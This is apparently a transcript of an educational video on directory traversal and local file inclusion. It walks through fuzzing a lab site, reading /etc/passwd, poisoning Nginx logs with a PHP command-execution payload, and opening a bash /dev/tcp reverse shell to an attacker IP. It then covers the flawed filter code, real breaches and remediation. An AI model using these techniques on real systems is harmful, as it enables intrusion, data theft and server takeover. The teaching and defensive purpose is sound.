Hello, how's it going? Today I wanted to discuss another category of common web vulnerabilities, directory traversal and file inclusion. Directory traversal is a vulnerability in a web server or an API in which an unintended internal file is able to be accessed. This can allow an attacker to move between files or directories and view resources that might contain sensitive information. And file inclusion is a type of directory traversal where the internal file is not only accessed, but it can also be executed. And so this can lead to more severe consequences like remote code execution and ultimately server takeover. So because I usually understand things better when they're illustrated, I'll start by performing some basic demonstrations of each of these vulnerabilities. And then we'll have a look at the vulnerable code and finally talk about how to avoid or catch these issues before they can be exploited. Just before we begin the first demonstration, I wanted to very quickly go over the basics of directory traversal and path traversal in a Linux machine. It's very similar in Windows. If I type in present working directory, I can see that I'm in a video folder in my home directory. If I wanted to go up into my main directory, I can traverse that by change directory and use a .. which will move me up one directory. So I'm able to traverse around different directories by using this approach. So if I go back into videos, I could traverse up and then back down into another folder. And that in that way I can move around and view different files and folders on the system. So with that in mind, let's jump into the first demonstration, which is of a directory traversal vulnerability. So we've got a basic website here, and one of the first things that I noticed when investigating the site is while I hover over this link, you can see in the bottom left corner that it's calling a download with a parameter, and it's calling a PDF document. When I click that, it's serving me up a zip file, which I'm not going to bother downloading for this demonstration. But the fact that it's dynamically calling content based on a URL parameter makes it something that I want to investigate. So in order to do that properly, I'm going to send it to my proxy, which is Burp Suite. And I'll send it to repeater so I can play with it. So the first thing I'm going to try is the really basic directory traversal, where I will go up a bunch of directories and see whether I can ask the web server to serve me up a different file, a file that I know exists on all Linux machines is the etc passwd. And I'm not getting any response back on that one. So even though this basic directory traversal doesn't work, there are a huge number of bypasses and filters and wrappers that we can use to try and get around firewalls and content filters. I've got open here a GitHub repo called Payloads All the Things, which is a great resource for CTF players. And there's a folder here around directory traversal and file inclusion, which includes a whole range of different encoding and filters and wrappers that we can use to bypass all sorts of filters. But rather than doing that manually, I will automate the process of trying all these different encoding approaches. So to do that, I'll just remove what I've got there and add in where I would like to fuzz. And then I'm going to save this request as a file. And then I'll jump into my terminal just to show you the word list that I'm going to be using. I'll go into seclists, which is another GitHub repository with a whole bunch of useful lists that can be used for fuzzing and for brute forcing. And so you can see this is just the top 10 lines, but it's got a whole bunch of different types of encoding and approaches to directory traversal. So I can automate running through all of these using a tool called Fuff, which is Fuzz Faster You Fool. And so I'll grab my request. I need to specify The protocol is HTTP rather than HTTPS, and I'll give it that word list of, I'll just copy it. I'll match code all, and I'm going to filter empty responses. And you can see it's run through almost 1,000 different options there, and there's a common theme showing up, which is a ... seems to be returning some sort of data. So if I grab one of these and see what's returned, right, we get back a PK is the magic bytes, which indicates that this is a zip file, which means we can't just read this directly off the web server. To make the process a bit easier, I've written a Python script, just a basic Python script, which is going to grab the, perform the directory traversal, grab the path and file that I request, and it'll unzip and write the outputs to the terminal. So if I run this with etc parsewd, it will now print the file out to the terminal for me. So as you can see, we're now able to view files directly off the server. This is obviously a pretty major issue. We'd be able to leak all sorts of sensitive information, including databases, which might have personal information, sensitive configuration information, passwords, SSH or GPG keys, and all sorts of other things that could lead to further compromise. So before we look at the code from that example, we'll jump onto the second demonstration, which is of a local file inclusion vulnerability. Jumping across to the website for this demonstration, as we click around, once again, I'm noticing that in the URL, we have a index.php, which has a parameter that is calling content dynamically. And again, that's something that I would want to investigate. So to look into this further, I'm going to send it over to burp, which is my proxy once again. I'll send it into repeater. And again, I'll just do a basic LFI test. I'll traverse up a whole bunch of directories trying to get to the root before looking at a file that I know will be there and should be readable, which is etc parsewd. Again, I'm not receiving any response from this, so I'm going to fuzz and see if there are any bypasses. So again, I'll make this fuzz to mark where I want FFUF to insert the payloads. I'll copy it to file. I'll call this page.request. And I'll use the same format here and just call page.request. And once again, we see the same pattern seems to be effective at bypassing, which is basically just doubling up the ... And we'll look into why that works in just a moment. But to demonstrate what makes this a local file inclusion rather than just a directory traversal, I'll jump in and have a bit more of a play in the burp suite repeater. So in this case, we just get presented back the file that we request directly, so there's no need to do any scripting. But one of the things I might want to look at would be the source code for index.php, for example. So if I go up and call index.php, don't get anything. It might be in the same file. It is. Now the interesting thing here is that it is not providing back the PHP code, but it's actually rendering the site in the same way that it would be if we just went to index.php. And this means that the web server is actually executing PHP code that gets accessed through this file inclusion. So that means that if we're able in any way to get malicious PHP code onto the server, we should then be able to access it and execute it. And that can lead to full server takeover, which I'll demonstrate now. One common way to achieve this is to use the logging functionality to drop malicious content into the logs and then access the logs. and that's the approach that I'll use as part of this demonstration. Just one note before I continue, this isn't an exclusive vulnerability for PHP. Local file inclusion can happen with Node.js, Java, .NET, a whole bunch of other web frameworks, but PHP is a very common one. So to demonstrate gaining remote code execution, I'm going to find the log files, which from initial enumeration, I know that this is an Nginx server. So that should be storing its logs in var log nginx access.log. And I need to do the directory traversal first. And we can see that it's logging the IP address, date and time from the server, what is being requested, and the response code. That's probably the response size. Not sure what that is, but then it's also logging our user agent. And this is probably the easiest place to drop in some malicious PHP code. And so just to demonstrate, I'll put in a very basic PHP system command that can be triggered. Just check that's valid. Yep, so basically this is going to call a system command, and the command that gets passed is going to be via the parameter cmd. So just to check that that's worked, it hasn't errored. This is going to be right down the bottom of the logs. All right, it's not showing up just yet, so it should work if we add another parameter here, the cmd parameter, and I'll just do id, which is a Linux command to provide identity information. There we go. It's provided back the response from the server. So I now have command execution. This command that I've passed is getting executed on the server. So what's happening, just to cover it back off, user agent is a malicious bit of PHP code. And now when I view this file, because it's a local file inclusion, it's actually going to execute any PHP code that it's got. And there is PHP code logged in the log file. That PHP code is expecting an additional parameter, cmd, and with the cmd parameter, it will execute a system command. And in this case, the system command is id. I can escalate this to a full TTY shell and basically a full command line access to the server, and I'll demonstrate that very quickly. So firstly, I'll just confirm my IP address, 1426, and then I'm going to set up a listener on port 9001. Coming back in here, I'm going to add a very simple bash reverse shell, bash-c, bash-i, and dev tcp 10.10.14.26, port 9001, 0 and 1. And then I will URL encode this. Now when I send that request, the server hangs, which is a good sign. And I have a fully interactive shell on the server. So I'm able to enumerate, I can pivot into the rest of the corporate network, I could establish persistence, I could access even more sensitive information, drop malicious code onto the website that infects users visiting the site, or even just simply deface the site. The damage in this instance can be very significant. Okay, moving on to the code review. Once again, I use Sneak Code Scanner to have a look for vulnerabilities automatically. And in this instance, this is the code from the first example. Code Security Scanner is finding a cross-site scripting vulnerability, but it isn't finding a directory traversal vulnerability. In the second example, however, we can see there is a high finding and it is seeing the file inclusion. I'm not sure exactly why it's finding it in the second example, but not the first. But I suppose the takeaway from that is that while static analysis and code scanning can be very useful, it's not always going to find these sort of issues, and it's not really a guarantee that your code is 100% safe. So jumping into the actual code in question, this is the first example, and the vulnerable script is download.php. So we can see here that we've got a loop checking whether the file parameter is set. There is an attempt here to filter out user input, and so what it's doing is finding instances of .. which is the directory traversal, and replacing any instances of that with nothing. So it does remove .. but what it isn't doing is recursively doing that. So it doesn't then check whether after it removes .. are there any other instances of .. and that's why our bypass worked. So we submitted .. This check here would see the .. remove it, but then doesn't recursively check, and what we're left with is the .. And so that's why this is vulnerable still to a directory traversal. And then you can see it's zipping up the file and serving it back. In the second example, we have a very similar filter being employed, which again is looking for the .. string and replacing with a blank. Again, because it isn't recursive, it's not going to catch all of the bypasses. In most frameworks, including PHP, there are libraries, functions, classes, etc., which can be used to normalize and filter user input that won't be vulnerable to such simple bypasses. And these really should be employed wherever possible. But we'll talk more about remediation and avoidance a little bit later on. So I wanted to also share some real-world examples to demonstrate how common this vulnerability is, but also how big the impact can be. So I've just pulled up on cvedetails.com a list of CVEs, common vulnerabilities and enumerations. That's the sort of formal cataloging of software vulnerabilities. And I pulled up a list from most recent, which are related to LFI or directory traversal. And we can see that there are a very large number of these sort of vulnerabilities, and they happen very frequently. Watching the date, it seems to be multiple per month is roughly the average of discovered vulnerabilities, including in some really large and well-respected bits of software like Zoom desktop client, for example. So this really is just to demonstrate how common this vulnerability really is. Now to look at a couple of real-world examples. So this is from Brightsec. It's a file about LFI, and there are some examples here. The big one that gets called out is the adult friend finder breach, but they also mentioned the Tim Thumb, which was a WordPress plugin or add-on script that was vulnerable, and this was used to compromise more than 1.2 million websites. Couple of other examples: the Red Hat website was breached in 2013, weather.gov breached in 2012, and WhatsApp server in 2013. This page here is talking about the 16 biggest data breaches of the century, and coming in at number 2 is Adult Friend Finder from 2016, and there were 412 million account records, including accounts that had previously been shut down, that were leaked as a result of a LFI vulnerability. So this just really demonstrates how common on one hand and how dangerous on the other this sort of quite simple vulnerability can be. So with that in mind, how can we remediate and secure our systems against this sort of vulnerability? Firstly, at the architecture and design stage, we can ensure that dynamic file inclusion is only used if it's absolutely necessary, and that we choose and vet libraries, languages, frameworks, etc., which embed support for path normalization and user input validation. During development, firstly, we should implement the validation and sanitization, whether that's through whitelisting. So if there's a number of files that we expect to be accessed, for example, let's include a list of what those are. Path normalization / canonical paths. There are functions built into a lot of these frameworks that will automatically normalize or sanitize paths to a absolute canonical path. And then there's a whole range of environment and server hardening that will restrict this vulnerability and or restrict the impact if this vulnerability does exist. So we can restrict the file access for the web server just to specific directories. We can run it in a restricted environment or a jail, or in the context of a user that has the least possible privileges. We can disable remote inclusions, set the content security policy headers, and of course make sure we're filtering, logging and monitoring traffic and activity on the server. And this would include implementing an appropriate firewall. And finally, during the development cycle, implementing DevSecOps practices into the development cycle, which would include implementing code reviews and automated scanning, so that's static code analysis or testing, performing dynamic analysis and testing as part of the dev lifecycle as well, or at least at regular interviews, and making sure we're using proper secrets management. That means never store your secrets in plain text or within the code, and making sure we have a secret scanner to catch in case that happens. And finally, to conduct regular penetration testing, but this is really a last line of defense, and we don't want to rely on that as the only point at which we catch or avoid these sort of vulnerabilities. So that's a quick overview of the LFI and file directory traversal vulnerabilities. One related vulnerability that we did skip today was the RFI, remote file inclusion. Very similar to LFI, but instead of loading local scripts, you're able to load remotely hosted scripts and execute them on the server. As always, I hope you enjoyed. If you have any questions or comments, please feel free to leave them below or reach out directly. Have a Merry Christmas, and I hope you and your families have a great holiday period, and look forward to seeing you in the next one. Thank you.